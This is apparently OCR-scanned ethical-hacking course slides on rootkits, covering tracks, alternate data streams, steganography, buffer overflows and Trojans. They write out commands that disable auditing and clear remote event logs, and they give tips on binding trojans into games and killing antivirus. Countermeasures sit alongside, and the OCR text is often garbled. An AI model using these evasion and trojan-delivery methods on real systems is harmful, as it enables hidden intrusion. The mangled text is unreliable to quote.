

Browse... 


Save Text Log To: 


Jc: \temp\iks.txt 


Browse... 




Go! 



dhow l9 mr ^ ^ ^ tm l ka^ rt^tn^ 



n 'DanT' ee^ dtfwew «» new 
[^[n=rflir 
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H acki ng Tool : H ardware Key Logger 
(www. keyghost.com) 



0 The H ardware Key 
Logger is a ti ny hardware 
device that can be 
attached i n between a 
l<eyboard and a 
computer. 

© 1 1 l<eeps a record of all 
key strokes typed on the 
keyboard. The recording 
process is totally 
transparent to the end 
user. 
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Anti Spector (www.antispector.de) 



© This tool wi 1 1 detect Spector and detect them from your 



system. 



SpGC 




Ul .1. .- - 



.antispector.de) 




This tool recognizes an installed surveillance tool called SPECTOR. 
Dieses Programm spLirt das Uberwachungstool SPECTOR auf. 



SPECTOR is not installed. 
SPECTOR ist nicht installiert. 



If SPECTOR is installed, please click on REMOVE for removing SPECTOR. 
Wenn SPECTOR installiert ist, bitte auf "Entfernen" klicken urn SPECTOR zu entfernen. 



^ Remove / Entfernen 



Close / Schliessen 
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Hacking Tool: RootKit 



© What if the very code of the operati ng system came 
under the control of the attacker? 

© The NT/ 2000 rootkit is built as a kernel mode driver 
which can be dynamically loaded at run time. 

© The NT/ 2000 rootkit runs with system privileges, right 
at the core of the NT kernel , so i t nas access to al I the 
resources of the operati ng system. 

© The rootkit can also: 

• hide processes (that is, l<eep them from being listed) 

• hidefiles 

• hide registry entries 

• i ntercept keystrokes typed at the system consol e 

• issuea debug interrupt, causing a blue screen of death 

• redirect EXE files 
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©The rootkit contai ns a kernel 
mode device driver, called 
_ root_ .sys and a launcher 
program, called deploy.exe 

©After gai ni ng access to the 
target system, he wi 1 1 copy 
_ root_ .sys and deploy.exe 
onto the target system and 
executedeploy.exe 

©This will install the rootkit 
device driver and start it up. 
The attacker later deletes 
deploy.exe from the target 
machine. 
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L 



© The attacker can then stop 
and restart the rootkit at 
wi 1 1 by usi ng the 
commands net stop _ root 
and net start _ root_ 

© Once the rootkit is started, 
the f i I e _ root_ .sys stops 
appeari ng i n the di rectory 
listings. The rootkit 
i ntercepts the system cal I s 
for listing files and hides 
all files beginning with 
_root_ from display. 



Rootkit Countermeasures 



©Back up critical data (not 
binaries!) Wipe everything clean 
and reinstall OS/ applications 
from trusted source. 

©Don't rely on backups, because 
you could be restori ng from 
trojaned software. 

©Keep a well documented 
automated i nstal I ati on 
procedure. 

© Keep aval I abi I i ty of trusted 
restoration media. 



Q AFX Windows Rootkit 2003 



09 



Processes 



T 



Files 



Registry 



Connections 



lum.exe 



sub7.exe 

bionetexe 

sdbotexe 



Generate 



Help 



^ ^ About 



http: //www. iamapheH. cib. net http: / /www. me□asecu^it^J■ org 
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Coveri ng Tracks 
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© Once i ntruders have 
successfully gained 
Administrator access on 
a system, they wi 1 1 try to 
cover the detection of 
their presence. 

© When all the information 
of i nterest has been 
stri pped from the target, 
they wi 1 1 i nstal I several 
back doors so that easy 
access can be obtai ned i n 
the future. 



Disabling Auditing 



C : \ > audit po 1 . eie /d is able 
Running. . . . 

Local audit information changed successfully. 
New local audit policy. . . 

(0) Audit Disabled 

AuditCategorySystem = No 

AuditCategoryLogon = Failure 

AuditCategoryObj ectAccess = No 



C:\> auditpol.exe /enable 

Auditing enabled successfully. 



© First thing intruders will 
do after gaining 
Administrator privileges 
is to disable auditing. 

0 NT Resource Kit's 
auditpol.exe tool can 
disable auditing using 
command line. 

© At the end of thei r stay, 
the i ntruders wi 1 1 j ust 
turn on auditing again 
using auditpol.exe 
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© I ntruders can easi ly wi pe 
out the logs i n the event 
vi ewer 

© Eventviewer on the 
attackers host can open, 
read and clear logs of the 
remote host. 

© This process will clear 
logs of al I records but 
wi 1 1 leave one record 
stati ng that the event log 
has been cleared by 
'Attacker' 
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© elsavaexe utility is a simpletool for clearing the event 
log. The foil owing syntax will clear the security log on 
the remote server 'rovi I ' ( correct privi leges are requi red 
on the remote system) 



|c:\> elsave -s Wrovil -I "Security" -C 



©Save the system log on the local machine to d:\system.log 
and then clear the log: 

elsave -I system -F d:\system.log-C 

©Save the application log on Wservlto 
\ \ servl\ d $\ appi i cati on . I og: 

el save - s \ \ servl - F d :\ appI i cati on . I og 
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H acki ng Tool : Wi nZapper 



© Wizapper is a tool that an attacker can use to erase 
event records select! vely fronn the security log i n 
Windows 2000. 

© To use the program, the attacker runs wi nzapper.exe 
and marks the event records to be deleted, then he 
presses 'delete events' and 'exit'. Presto the events 
disappear. 

© To sum things up: after an attacker has gained 
Admi nistrators access to the system, one si mply cannot 
trust the security log! 
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0 Evidence Eliminator is 
an easy to use powerful 
and flexible data 
cleansi ng systenn for 
Windows PC. 

0 Daily use protects you 
from unwanted data 
becoming permanently 
hidden in your PC. 

0 It cleans recycle bins, 
I nternet cache, system 
files, temp folders etc. 
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Evidence Eliminator 



EE 



evidence' 

eliminator v5.0 



I Sdic- Jill 



tm 



Safe Resta... 



Quick Mode 



Test Moi 



jct is registered^ 



Option; 



Task 



Status 



Generating random data 
^ Recycle Bin on C:\ 
^Drives can With Mask C:\ 
■^i^Windows Swap File 
1^ Windows Application Logs 
^ Common Dialog [Last Visited] 
^Common Dialog [Open/Save] 



Done 
Done 
Analyzing.. 



lEL Lni 

Iel 

IeL Lni 

Iel 



Lnat Lng File: C:\r-ecycLed\desktop.LnL <Sk Lpped systen f L Le> 
LnatLng File: C:\recycLed\DC15.GIF <P1 >C0]<HflnE><ZERO><KILL><OK> 
Lnat Lng FLLe: C:\r-ecycLed\INF02 <P1 >[0]<NflME><ZERO><KILL><OK> 
Lnated 2 f L Le(sJ 

ELLniLnatLng folder tree: C: \recyc Led\ eKcLudlng root f o Lder. . . <0K> 
DrLye Scan no. 1 C:\ 

Scanning C:^ for nask *.tnp ... please wait. 



D I sab I L n g any se I ect ed Screen Sayer . . . < OK > 
iGenerat lng random data...<OK> 
lElLnLnatlng Folder: C:\reoycLed\ 

IScann lng C:\recyc Led\ for nask *.* ... please wait... <0K> 
IF I Les found: 3 



Stop Work 1 ielp 


1 Clear Log | 


Copy Log | 


Save Log | 


1 Vijsgife 




J]^ canning C:\ for mask MmD . 


. Dbase waiL 











HidingFiles 



© Therearetwowaysof hi ding files in NT/2000. 

• lAttrib 

- use attri b +h [fil^ directory] 

• 2. NTFS Alternate Data Streaming 

- NTFS files system used by Windows NT, 2000 and XP has a 
feature Alternate Data Streams - al low data to be stored i n 

h i dden f i I es that are I i n ked to a normal vi si bl e f i I e. 

© Streams are not I i mi ted i n size and there can be more 
than one stream linked to a normal file. 
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Creati ng Alternate Data Streams 



©Start by goi ng to the 
command I i ne and typi ng 
notepad test.txt 

0Put some data in the file, 
save the file, and close 
Notepad. 

0 F rom the command I i ne, 
type di r test.txt and note the 
file size. 

0 N ext, go to the command 

1 i ne and type notepad 
test.txt: h i dden .txt Type 
some text into Notepad, save 
the file, and close. 



0Check the file size again and 
notice that it hasn't changed! 

0l f you open test.txt, you see 
your original data and nothing 
else. 

0lf you use the type 

command on the filename 
from the command I i ne, you 
still get the original data. 

0l f you go to the command 
line and type type 
test.txt: hi dden .txt you get 

an error. 



Tools: ADS creation and detection 



makestrm.exe moves the physical contents of a file to its 
stream. 



DianondCS MakeStrean Deno - http://uuu.dianondcs.con.au 
x.org successfullv conuerted to x.org:StreanTest 



0 ads_catfrom Packet Storm isa utility for writing to NTFS's 
Alternate File Streams and includes ads_extract, ads_cp, 
and ads_rm, utilities to read, copy, and remove data from 
NTFS alternate file streams. 

0 Mark Russinovich at www.sysinternals.com has released 
freeware uti I ity Streams which displays NTFS fi les that have 
alternate streams content. 

0 H eysoft has released LADS (List Alternate Data Streams), 
which scans the entire drive or a given directory. It lists the 
names and size of al I alternate data streams it f i nds. 
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NTFS Streams countermeasures 



© Del eti ng a stream f i I e i n vol ves copy! ng the 'front' f i I e to 
a FAT partition, then copying back to NTFS. 

0 Streams are I ost when the f I! e 1 s moved to FAT 
Partition. 

0 LNS.exefrom (http://ntsecurity.nu/cgi- 
bin/ download/ lns.exe.pl) can detect streams. 



steal i ng F i I es usi ng Word Documents 



0 Anyone who saves a word document has a potentially 
new security risk to consider - one that no current anti- 
virus or Trojan scanner will turn up. 

© Thecontentsof the files on victim's hard drives can be 
copied and sent outside your firewall without even their 
knowi ng. 

© The threat takes advantage of a speci al feature of word 
called field codes. 

© Here's how it might work: Someonesends victim a 
Word document with a field-code bug. The victim opens 
the file in Word, saves it (even with no changes) , then 
sends it back to the origi nator. 
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©Use Hidden Field 
Detector. It's avail able free 
at: 

http:// www. woodyswatch.c 
om/util/sniff/ 

©H idden field Detector 
upon installation will install 
itself on your Word Tools 
Menu. 

©It scans your documents 
for potenti al ly troubl esome 
field codes, which you cant 
see easily and even warns 
you when it finds 
something suspicious. 
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^ Spyware Ssmple.doc ^ Mkrosoft Ward 



Fdd |di| yim InseJt Format 
Melding 2 * tnA 

IBS, 

: Fnafl 5howing Markup ^ Show ' ^ 



B®5 



spelling and Gramma . . 
L^guage 
Word Court... 

Speech 

L^ers and Mailings 
Tool? on ^heWefan . 
Options.. 



F7 



n 1 11 If ^^"^ ' ^ 



11 liriEBiP D'i 



Rfiply with Changes ... J 




Cu 1 "funii'' ytail ^^ui dlb will i ^fcwriEiit C aUatinHifh ^iJ^lflljliL'* liJ^c His, nc? 

Ldt me iut t0 «kut Y«u law the [fid den Detect ^t^'^ iui^e^ li^kt^ G^^i Tt^ tlu 
I Ql4hT«4is I Difect HidA 

3. tHA A eut tk phnie 

If jci^h ii^j^'^^Td 97 01 2000^ uid I KRruripedi^iU^ ^vhiii SLt I wiled it sliil faviii ^011, tkr 

4* jM]/tliiK| vf^Hp All y^^n Ad ^ iht^,^h ^^<UTi(Kt C#Uiib4ntl0K SlfjHEH^ flild tii 
iiit^ dK'''- Asid ^du didWtiee t. tihix^ ^ ytu} 




What is Steganography? 



©The process of hiding data 
in images is called 
Steganography. 

©The most popular method 
for hiding data in files is to 
uti i ze graph i c i mages as 
hiding place. 

©Attackers can embed 
information such as: 

L Source code for hacking 
tool 

2. Li St of compromised 
servers 

B.PIans for future attacks 

4.. your grandma/ s secret 
cookie recipe 
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Tool : I mage Hide 



©ImageHideisa 
steganography program. Can 
H ide loads of text i n i mages. 

©Simple encrypt and decrypt 
of data 

©Even after adding bytes of 
data, there is no i ncrease i n 
image size. 

© I mage I ooks the same to 
normal pai nt packages 

©Loads and saves to files and 
gets past all the mail sniffers. 
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^ Image Hide - Dancemmammal.cDm 



File Edit Image Tools Window 

□ B H ^ ^ [1 iP^r^^ rf 



^ o Avoid saving files ; 



ft C:\Documents and Settin 



Jn|x| 




^ C:\Documents and 5ettings\. 



0 



Read Write 



Encrypt Decrypt 




[This is to demo hiding text using ^ 
ImageHide ^ 



Hidden text space in bytes: 24185 



Copyright (c) 2001 DanceTnatmnal 



Tool : M pBStego 



0MP3Stego will hide information in MPS files during the 
compression process. 

©The data is first compressed, encrypted and then hidden 
i n the M P3 bit stream. 



ISbit, Length: Q: 0:20 



ov C:\WINDOWS\System32\cmd.exfi 

Z:\Deuelopnent\MP3Stego>encode -E hidden_text.txt -P pass suega.uau suesfa_stego .mp3 
1P3StesfoEncoder 1.1.15 
See README file for copyright info 

licrosoft RIFF, UAUE audio, PCM, mono 44100Hz 16bit, Length: 0: 0:20 
1PEG-I layer III, none Psychoacoust ic Model: flT&T 
Bitrate=128 kbps De-emphasis: none CRC: off 
Encoding "suega.uau" to "suega_stego .mp3" 
Hiding "hidden_text.txt" 

[Frame 791 of 791] <100.00>;> Finished in 0: 0: 6 

Z:\Deuelopment\MP3Stego>decode -H -P pass suega_stego .mp3 
1P3StegoEncoder 1.1.15 
See README file for copyright info 

Input file = ' suega_stego -mp3' output file = ' suega_stego . mp3 - pcm' 
Will attempt to extract hidden information. Output: sgega_stego.mp3.txt 
the bit stream file suega_stego . mp3 is a RINARV file 

HDR: s=FFF, id=l, 1=3, ep=off, br=9, sf=0, pd=l, pr=0, m=3, js=0, c=0, o=0, e=0 
alg.=MPEG-l, laver=III, tot bitrate=128, sfrq=44-l 
mode=single-ch, sblim=32, jsbd=32, ch=l 

[Frame 791 ]Ayg slots/frame = 417.434; b/smp = 2.90; br = 127.839 kbps 
Decoding of "suega_stego .mp3" is finished 

The decoded PCM output file name is "suega_stego .mp3 .pern" 
Z : \Deue lopment\MP3S t ego 



1^ 
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Tool: Snow.exe 



© Snow is a whitespace steganography program and is 
used to conceal messages i n ASCI I text by append i ng 
whitespace to the end of I i nes. 

© Because spaces and tabs are general I y not vi si bl e i n text 
viewers, the message is effectively hidden from casual 
observers. I f the bui It i n encryption is used, the message 
cannot be read even if it is detected. 



To Encode the Message to a file — myfile.doc 

snow -m "Swiss bank a/c: 3453434" ~p "password-123" myfile.doc 
myf ile2 . doc. 

To extract the message, the command would be 

snow -p "password- 123" myfile2.doc 
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Tool : Camera/ Shy 



0 Camera/ Shy works with Wi ndows and I nternet 
Explorer and lets users share censored or sensitive 
information buried within an ordinary gif image. 

© The program lets users encrypt text with a cl ick of the 
mouse and bury the text in an image. The files can be 
password protected for further security. 

© Viewers who open the pages with the Camera/ Shy 
browser tool can then decrypt the embedded text on the 
fly by doubl e-cl i cki ng on the i mage and suppiyi ng a 
password. 
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Steganography Detection 



0 Stegdetect is an automated tool for detecting 
steganographic content in images. 

© 1 1 is capable of detecting different steganographic 
methods to embed hidden information in J PEG images. 

© Stegbreak is used to launch dictionary attacks against 
J steg-ShellJ PHideand OutGuess 0.13b. 
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Tool: dskprobeexe 



© Windows 2000 Installation CD-ROM 

0 dskprobaexe is a low level disk editor located in 
Support Tools di rectory. 

0 Steps to read the efs temp contents: 

LLaunch dskprobeand open the physical drive to read. 

2. CI ick the Set Active button adj ustment to the drive 
after it populates the handle '0'. 

3. CI ick Tools -> Search sectors and search for string 
efsO.tmp (in sector 0 at the end of the disk). 

4. Y0U should select Exhaustive Search, Ignore Case 
and Unicode characters. 
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Buffer overf ows 



©A buffer overrun is when a program allocates a block of memory of a 
certai n length and then tries to stuff too much data i nto the buffer, 
with extra overflowing and overwriting possibly critical information 
crucial to the normal execution of the program. Consider the foil owing 
source code: 

©When the source is compiled and turned into a program and the 
program is run, it will assign a block of memory 32 bytes long to hold 
the name string. 



#±nc3liKie <i 
i 

dh^r naHni«£31] 
pzrinhf ( " fiLeasc 
g:eiia (name) ; 
pzrxzxhf (''BelXo, 

I 



tdio. 1ii> 
) 



-type yoiif name: " ) ; 



%i 



iia.nie> 



Buffer overflow will occur if you enter: 

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAA 
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Out ook Buffer Overflow 



© Thereisa vulnerability in Microsoft Outlook client. The 
attacker sends an e-mail with a malformed header that 
causes buffer overflow to occur. 

1 1 1 wi 1 1 cause the victi m's machi ne to crash or 

2.Cause arbitrary code to run on the victim's computer. 

0 Affects the foil owing versions: 

M icrosoft Outlook versions 97/98 and 2000. 

M icrosoft Outlook Express 4.0, 4.01 5.0 and 5.01 
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List of Buffer Overflow Cases 



© Netmeeting 2.x exploit 

© (http://www.cultdeadcow.conn/cDc_files/cDc- 35]/) 
© NT RAS Exploit 

© ( http:// www.cerberus- i nfosec.co. ul</ wprasbuf . html ) 
© I IS Hack 

© (http://www.eeye.com) 
© Oracle Web Exploit 

© (http:/ / www. Cerberus- i nfosec.co.uk/ advowl .html ) 
© Outlook Exploit 

© ( http:/ / www. ussrback.com/ 1 abs50 . html ) 
© I IS. printer 

© (http://www.securityfocus.com/bid/2674) 
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Protection against Buffer Overflows 



© Buffer overflow vul nerabi I ities are i nherent i n 
code due to poor or no error checking. 

© General ways of protecting against buffer 
overflows: 

1 Close the port of service 

2. apply vendors patch or install the latest version of 
the software 

3. F i Iter specif i c traff i c at the f i rewal I 

4. Test key application 

5. Run software at the least privilege required 
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Summary 



0 H ackers use a vari ety of means to penetrate systems. 

0 Password guessi ng / cracki ng i s one of the f i rst steps. 

0 Password sniffi ng is a preferred eavesdroppi ng tactic. 

0 Vul nerabi I ity scanni ng ai ds hacker to i dentify whi ch 
password cracking technique to use. 

0 Key stroke I oggi ng / other spy ware tool s are used as 
they gai n entry to systems to keep up the attacks. 

0 I nvari ably evidence of "having been there and done the 
damage" is eli mi nated by attackers. 

0 Steal i ng f i I es as wel I as H i d i ng f i I es are means used to 
sneak out sensitive information. 
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Ethical Hacking 



Module VI 

Trojans and Backdoors 
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Module Objective 



© Terms of reference for vari ous mal i ci ous code 

0 Defining Trojans and backdoors 

© U nderstandi ng the various backdoor genre 

© Overvi ew of vari ous Troj an tool s 

© Learning effective prevention methods and 
countermeasures 

© Overvi ew of Anti -Troj an software 

© Learn i ng to generate a Trojan program 
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Trojans and Backdoors 



A Trojan horse is: 

© An unauthorized program contained within a legitimate 
program. This unauthorized program performs 
functions unknown (and probably unwanted) by the 
user. 

0 A legitimate program that has been altered by the 
placement of unauthorized code within it; this code 
performs functions unlcnown (and probably 
unwanted) by the user. 

© Any program that appears to perform a desi rable and 
necessary function but that (because of unauthorized 
code within it that is unknown to the user) performs 
functions unlcnown (and definitely unwanted) by the 
user. 
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Working of Trojans 




©Attacker gets access to the troj aned system as the system 
goes online 

0 By way of the access provi ded by the troj an attacker can 
stage attacks of different types. 
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Various Trojan Genre 



© Remote Access Trojans 

0 Password Sending Trojans 

0 Keyloggers 

0 Destructive 

0 Deni a! Of Servi ce ( DoS) Attacl< Troj ans 

0 Proxy/ Wingate Troj ans 

0 FTP Trojans 

0 Software Detecti on Ki II ers 
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M odes of Transmi ssi on 



© ICQ 
0 IRC 

© Attachments 
© Physical Access 

© Browser And E-mail Software Bugs 
© NetBIOS (FileSharing) 
© Fake Programs 

© U n- trusted Sites And F reeware Software 



Tool : QAZ 



0 1 1 is a companion vi rus that can spread over the 
networl<. 

0 1 1 also has a "bacl<door" that wi 1 1 enable a remote user 
to connect to and control the computer usi ng port 7597. 

0 1 1 may have ori gi nal ly been sent out by emai I . 

0 Rename notepad to note.com 

0 Modifies the registry key: 

H KLM\software\M icrosoft\Windows\CurrentVersion\ 
Run 
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Hacking Tool :Tini 



htt p : / / n tsecu r i ty . n u/ tool box/ 1 i n i 

0 It isa verytinytrojan program which is only 3 kb and 
programmed in assembly language. It takes minimal 
bandwidth to get on victim's computer and takes small 
disk space. 

© Tini only listens on port 7777 and runs a command 
prompt when someone attaches to this port. The port 
number is fixed and cannot be customized. This makes 
it easier for a victi m system to detect by scanni ng for 
port 7777. 

© F rom a ti ni cl i ent you can tel net to ti ni server at port 
7777 
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Tool: Netcat 



^ C:\WINNT\System32\cmd.eKe - nc 210.212.219.76 80 



C:\Pr03ran Files\Tools\Netcat>nc 210.212.219.76 80 
GET / HTTP 



HTTP/1.1 200 OK 

Date: Mon, 16 Jun 2003 06:21:22 GNT 

Server: ftpache/l .3 .19 <Unix> <Red-Hat/Linux> 

Last-Modified: Sun, 15 Jun 2003 11:34:01 GMT 

ETag: "467d8-3619-3eec59a9" 

Accept— Ranges : bytes 

Content-Length: 13849 

Connection: close 

Content— Type : text/htnl 

<}itril> 



©Outbound or inbound connections, TCP or UDP, to or from any 
ports 

©Abi I ity to use any local source port 

©Abi I ity to use any local I y- configured network source address 
©Built-in port-scanning capabilities, with randomizer 
© B u i 1 1- i n I oose sou rce- r out i n g capabi I i ty 
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I^Donald Dick 1.53 






File System ] Registry ] 


Processes ] Windows | 


Keyboard 


Miscellaneous ] Passwords 


] System ] Server 


About 




fc.YAWORSl4Y 



bI 



127.0.0.1 



The attacker uses the client to send 
command through TCP or SPX to 
the victim listening on a pre 
defined port. 

Donald Dick uses default port 
either 23476 or 23477 
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Donald Dick is a tool that enables a 
user to control another computer 
over a network. 

1 1 uses a cl lent server architecture 
with the server residing on the 
victim's computer. 



I^Donald Dick 1.53 








Miscellaneous ] Passwords 


System 


Server 


About 



File System | Registry ] Processes ] Windows | Keyboard 
^ I z] 1^ 

Name , Size Date . Time 





Connection 



Connection 










SPX ^ 




d 1 


1 Ping 





Tool: SubSeven 





ip/uin: 


- port: 27374 


disconnect ! ||| 


1 connection 4\ 


puter name: OEMCO 


MPUIbR 



ip scanner 
get pc info 
get home info 
server options 
ip notify 



keys/messages ' 

advanced 
rmiscellaneous ' 
fun manager ' 
extra fun 



user name: Standard 
windows folder: C:\WINDOWS 

system folder: C:\WINDOWS\SYSTEM 
computer owner: ^ 
company: 
version: 4.90 (3000.) 
platform: Windows Millennium Edition 
windows key: pMi^ 

resolution: 1024.768 [16bpp] 
directxversion: 4.08.00.0400 

cpu: Genuinelntel [897.0 MHz] 
disk size: 23.973.1 50.720 bytes 
diskfree space: 1 4.31 9.828.992 bytes 
clients connected: 1 



- idle - iinfo retrieved. 



©SubSeven is a backdoor program that enables others to gai n ful I 
access to Wi ndows 9x systems through network connection. 

©The program consists of three different components : CI ient 
(SubSeven.exe), Server (Server.exe) and a Server configuration utility 
(EditServer.exe). 

©The client is a GUI used to connect to server through a network or 
i nter net con necti on . 
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Tool: Back Oriffice 2000 



B02K Configuration Wizard - Step 1 




G02K CoNFiGUR^iiON N^iz^no 



Welcome to the B02K Configuration Wizard! 

This wizard will help you install components into 
your B02K server and configure them. First, you'll 
be asked to choose a B02K server, then we'll 
walk you through the process of configuring the 
server with a new password. 

When you're done, your B02K server will be ready 
for installation. Note that this wizard does not allow 
for full configuration flexibility. It is meant only to 
simplify the process of configuration. 



1^ Show this wizard on startup 



Next >> 



Back Orifice accounts for highest number 
of i nfestations on M icrosoft computers. 

The B02K server code is only 100KB. The 
client program is 500KB. 

Once installed on a victim PC or server 

machine, B02K gives the attacker 

complete control of the system. 
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B02K has stealth capabilities, it will 
not show up on the task list and runs 
completely in hidden mode. 



cDc Back Orifice Win32 GUI Client 



jTarget host:port 
|l27. 0.0.1 





Back Oriffice Plug-i ns 



© B02K functionality can be extended using BO plug-ins. 

0 BOPeep (Complete remote control snap in) 

0 Encryption (Encrypts the data sent between the B02K 
GUI and the server) 

0 BOSOCK32 (Provides stealth capabilities by using 
ICMP instead of TCP U DP) 

0 STCPI O (Provides encrypted flow control between the 
GUI and the server, making the traffic more difficult to 
detect on the network) 
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Tool: NetBus 



^ NelBusl.70, bycf 



Server nfliniii 



0|>eii CD-ROM 



Show imn^e 



Swn|> motive 



Stmt |>i o^i nin 



Ms^ mniin^ei 



Sci eeii{liiiii|> 



Get iiifo 



Host iinnie.'IP: 
J~ ill iiitei vnl: 
Fiiiictioii flelav: 

Poit Redii ect 



onlhost 



Phy $oiiii{l 



Exit Windows 



Seinl text 



Active wii{ls 



Poit: 



12J45 



Ai}oiit 



Afifl IP 



Memo 



Del IP 



A|>|> Refill ect 



Mouse |)os 



Listen 



Soun{l system 



Connect: 



Scnn! 



Seivei setii|> 



Conti ol mouse 



Oo to URL 



Key mnnn^iei 



File mnnn^iei 



No connection 
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Wrappers 



0 H ow does an attacker get B02K or any trojan i nstal led 
on the vi cti m's computer? Answer: U si ng Wrappers 

© A wrapper attaches a given EXE application (such as 
games or orifice application) to the B02K executable. 

© The two programs are wrapped together i nto a si ngle 
file. When the user runs the wrapped EXE, it first 
installs B02K and then runs the wrapped application. 

© The user only sees the latter appi i cation. 

One can send a bi rthday greeti ng which wi 1 1 i nstal I 
B02K as the user watches a bi rthday cake danci ng 
across the screen. 
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H acki ng Tool : Si I k Rope 



http://www.h2ohackerz.co.uk/ind 
ex2.htm 

0Silk Rope is a wrapper program 
and has an easy to use user- 
i nterf ace. 

0Si I k Rope bi nds BO i nstal I er with 
a program of your choosi ng, 
savi ng the result as a si ngle f i le. 

©Presently, the icon is the generic 
single-file- install icon (an opening 
box with a wi ndow i n the 
background), you can change it 
with an icon utility such as 
Microangelo. 
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Silk Rope 2000p by BHan Enigm 




Welcome to Silk Rope 2000. To begin, click the wizard button at right. When 
complete, click the "create" button below. 



liJizard 



Source Executable: 
Target Executable: 
BO Server: 



linfected.exe 



Target Date: 108/30/2002 




Tool: EliteWrap 



© http:// homepage. ntl world. com/ chawmp/ el itewrap/ 

© EliteWrap is an advanced EXE wrapper for Windows 
95/ 98/ 2K/ NT used for SFX archiving and secretly 
installing and running programs. 

© With EliteWrap one can create a setup program that 
would extract fi les to a di rectory and execute programs 
or batch f i I es to di spl ay hel p, copy f i I es, etc. 
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Tool: I con PI us 



IconPlus can be used to change icons in EXE files 



Icon Plus! - Coded by The EkCor 



□ Ig © S I H I «J -SIS - 
r Original File 



r 



^1^1 CurrenUcon: [o Totallcons: [o 



ricon Files- 



|7 Replace 32k32 icons |7 Replace IGkIG icons 



p Resulting File- 



pLast Operation (Compression / Compilation)- 
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Tool: Restorator 



Restorator 2.50 - CARestorator\TestMles\lmageTesLres ' 



File Resources Viewer Browser Bookmarks Joois Options Help Debug 

il^ii - y ► ^ HP jr; 



Files ill ^ ^,1 " "'^ 



Viewer 



H RC abl 



J Location | C:\Restorator\Testfiles 



\m-^ AcroRd32.exe 
aim.exe 
m-^ C00L9G.EXE 
S Copia diRebirth.exe 
[+]■■■ Jf copv_sessions.exe 
S"-^ dialer.exe 
E fpxpress.exe 
□■■■^ gsview32.exe 
El gswin32.exe 
S gswin32c.exe 
El"-^ gvwgs32.exe 
hhupd.exe 
HYPERTRM.EXE 
ieSsetup.exe 
IEBATCH.EXE 
IEXPLORE.EXE 
ImageTest.res 
S-QJ Icon 
□-QJ Bitmap 

[il"i^ import32.eKe 
S KnutschPad.exe 
El-j^l logagent.exe 

Bitmap\SPIJ\SH\Neutrar 




Name 


Size+ 


Type 


Modified 


Attrib... 


a.. 




Cartella di file 


04/08/99 18.22.44 




CJ Dialogs 




Cartella di file 


04/08/99 18.23.34 




CJ Exes 




Cartella di file 


04/08/99 18.23.16 




CjFindTest 




Cartella di file 


04/08/99 18.23.26 




CJ IcoCur 




Cartella di file 


04/08/99 18.23.28 




CJ MenuExe 




Cartella di file 


04/08/9918.23.30 




CJ ResPatcher 




Cartella di file 


04/08/99 18.23.30 




D User32 




Cartella di file 


04/08/99 18.23.32 




fbi ImageTest Backup.res 


0KB 


Resource File 


04/08/99 18.39.24 


A 


EiCL_MPBAC1K Backup. res 


1KB 


Resource File 


29/07/99 18.15.26 


A 


1] 34.txt 


2KB 


Documento di testo 


20/05/99 21.11.20 


A 



Bitmap 



404 X 204 - 24 bit colors 



61 open files 
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Packaging Tool: WordPad 



Document - WordPad 



file £dit View Jnssrt fs^nal Hdp 



Options 



^ Folder I Vie 



|Timts New Rorftan 



Notepad, ewe 



I 



Fife Types 
Registered file^pes: 



Edit File Type 



\E1 



[3 -^^^crd Search 
ScFflp obfeot 

Ji_ Scretrn Sdver 

I S end T □ Any Foldei Pov^ 

Send To Clipboard as Coi iiescrtpliort d type: jSctap objecl 
l]^ Send To Clipboard as Na 
I Send To Command Line [ 
Setup IniotfnaliDn 
HI Shoilicut irrio a docmeni 




s type details 




Content Type (MIME J; | 

Defaul E^ension for Contenit Tjpe: 
Sdion^ 



71 



^ I EKlension: 

Coftter^IypelMIt 

Opens with: 



qpen_ 



I 



Mew.. 



Edit. 



fiemov* 



lelDafaiUlt 







CIk 



r7\ E liable Quick View 



P Conf H nn open afler download 



Clos P^^AteAy* 



OK 



Cancel 
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Infecting via CD- ROM 



© When you place a CD in your CD-ROM drive, it 
automatically starts with some set up interface. An 
Autorun.inf file that is placed on such CD's is 
responsible for this act on which would look I ike this: 

[autorun] 

open^etup.exe 

icon=setup.exe 

0 Therefore it is quite possi ble that whi le runni ng the real 
setup program a trojan could be run very easi ly. 

© Turn off the Auto- Start functionality by doing the 
following: 

Start button- > Setti ngs- > Control Panel - > System- > 
Devi ce M anager- >CDROM->P roperti es - > Setti ngs 
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Hacking Tool: Whc 



0 Popular delivery vehicle 
for NetBus/ BO servers is 
a game cal led Whack- A- 
Mole which is a single 
executable cal led 
whackamolaexe 

0 Whack-A- Mole installs 
the NetBus/ BO server 
and starts the program at 
every reboot. 
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-A- Mole 



L 



Whafk A-Hole 



Ga^ll■|^^ P.=i:j^^ Abpgl 




BoSniffer 



© Soon after BO appeared, a category of cleaners 
emerged, clai mi ng to be able to detect and remove BO. 

© BOSniffer turned out to be one such Trojan that in 
reality installed Back Orifice under the pretext of 
detecting and removing it. 

© M oreover, it would announce itself on the I RC channel 
#BO_OWNED with a random user name. 
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Hacking Tool: Fireki Her 2000 



© FireKiller 2000 will kill (if executed) any resistant 
protecti on software. 

© For instance, if you have Norton Anti-virus auto scan in 
your taskbar, and ATGuard Firewall activated, this 
program will Kl LL both on execution, and makes the 
installations of both UNUSABLE on the hard drive; which 
would require re- installation to restore. 

© It works with all major protection software I ike AtGuard, 
Conseal, Norton Anti -Virus, McAfeeAnti -Virus etc. 

Tip: Use it with an exe binder to bind ittoatrojan before 
bi ndi ng thi s f i I e (troj an and f i reki 1 1 er 2000) to some other 
dropper. 
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I CMP Tunneling 



© Covert Channels are methods in which an attacker can 
hide the data in a protocol that is undetectable. 

© Covert Channels rely on techniques called tunneling, 
which allows one protocol to be carried over another 
protocol . 

© I CM P tunnel i ng i s a method of usi ng I CM P echo- 
request and echo- reply as a carrier of any payload an 
attacker may wish to use, i n an attempt to steal thi ly 
access, or control a compromised system. 
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Hacking Tool: Loki 



(www.phrack.com) 

©Loki was written by daennon9 to provide she! I access over I CM P 
making it much more difficult to detect than TCP or UDP based 
backdoors. 

©As far as the network is concerned, a series of I CM P packets are shot 
back and forth: Ping, Pong- response. As far as the attacker is 
concerned, commands can be typed into the loki client and executed 
on the server. 
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Loki Countermeasures 



© Configure your firewall to block I CMP incoming and 
outgoi ng echo packets. 

0 Blocking I CMP will disable ping request and may cause 
i neon ven i ence to users. 

© So you need to carefully decide on security Vs 
convenience. 

© Loki also has the option to run over UDP port 53 (DNS 
queries and responses.) 



Reverse www Shell - Covert channels 
using HTTP 



